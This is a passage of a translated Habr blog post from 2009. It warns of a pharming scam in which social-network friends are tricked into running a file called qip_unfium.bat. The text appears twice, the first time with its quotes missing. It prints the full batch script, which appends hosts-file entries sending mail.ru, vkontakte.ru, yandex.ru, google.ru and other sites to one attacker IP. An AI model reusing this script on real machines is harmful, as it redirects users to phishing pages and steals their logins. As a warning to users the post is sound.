Pharming in social. networks
It seems that another epidemic of pharming has begun through social networks.
In one of the well-known popular social networks (or maybe not one?), Through the system of personal messages, messages like are sent to friends:
To which a person, of course, gets an answer:
And after a while receives the following message:
(the address is closed with asterisks on purpose so that it is unflattering to click :)
As a person who has been taught life experience (including his own), I went through the link in the incognito browser mode. A shortened link leads to one of the most popular file sharing
The unsuspecting user clicks on this file, wanting to help a friend deal with the problem with Kvip Unfium, and ... the following code is executed:
')
By the way, before the actual body of the script in the file 662 empty lines.
The consequences of this script can not be mentioned.
Morality? I remind you one hundred thousand times: beware of fakes and check with your friends, and did they really send you such a link?
UPD, November 16, 2009: The second part of the Marlezons Ballet . :-)
In one of the well-known popular social networks (or maybe not one?), Through the system of personal messages, messages like are sent to friends:
I do not have one file that I need, can you trust me?
To which a person, of course, gets an answer:
I can, hello)
And after a while receives the following message:
urlshort.me ** file without any errors start?))
(the address is closed with asterisks on purpose so that it is unflattering to click :)
As a person who has been taught life experience (including his own), I went through the link in the incognito browser mode. A shortened link leads to one of the most popular file sharing
qip_unfium.bat , from which they offer to download the qip_unfium.bat file qip_unfium.batThe unsuspecting user clicks on this file, wanting to help a friend deal with the problem with Kvip Unfium, and ... the following code is executed:
@rem ----- ExeScript Options Begin -----
@rem ScriptType: console
@rem DestDirectory: temp
@rem Icon: default
@rem ----- ExeScript Options End -----
@echo off
echo 81.94.229.115 www.mail.i.ua >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 mail.i.ua >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.m.vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 m.vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 mail.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.mail.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.yandex.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 yandex.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.odnoklasniki.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 odnoklasniki.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.google.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 google.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.rambler.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 rambler.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.ya.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 ya.ru >> %windir%\system32\drivers\etc\hosts')
By the way, before the actual body of the script in the file 662 empty lines.
The consequences of this script can not be mentioned.
Morality? I remind you one hundred thousand times: beware of fakes and check with your friends, and did they really send you such a link?
UPD, November 16, 2009: The second part of the Marlezons Ballet . :-)
Source: https://habr.com/ru/post/73515/
All Articles